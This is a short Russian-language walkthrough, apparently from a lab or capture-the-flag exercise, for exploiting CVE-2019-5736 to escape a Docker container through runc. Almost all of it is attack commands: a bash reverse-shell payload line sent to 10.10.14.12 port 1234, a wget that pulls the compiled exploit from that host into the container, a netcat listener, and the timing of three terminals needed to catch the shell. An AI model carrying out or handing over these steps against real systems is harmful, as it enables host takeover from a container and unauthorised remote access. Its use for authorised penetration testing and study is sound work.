
Эксплойт на Go для CVE-2019-5736 (побег из контейнера Runc) с настраиваемой полезной нагрузкой reverse shell, предназначенный для тестирования на проникновение и операций red team против уязвимых контейнеров Docker.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
машина уязвима к CVE-2019-5736, следуйте шагам эксплойта Runc (CVE-2019-5736). Загрузите файл main.go, измените полезную нагрузку в файле на:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
После этого выполните:
go build main.go
Разместите HTTP-сервер:
python3 -m http.server

Затем откройте 3 терминала, как показано ниже:

Терминал 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Терминал 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Терминал 3
nc -nlvp 1234
как только вы запустите ./main в первом SSH-терминале, сразу же выполните вторую команду во втором SSH-терминале, после чего вы получите обратный shell netcat в третьем терминале

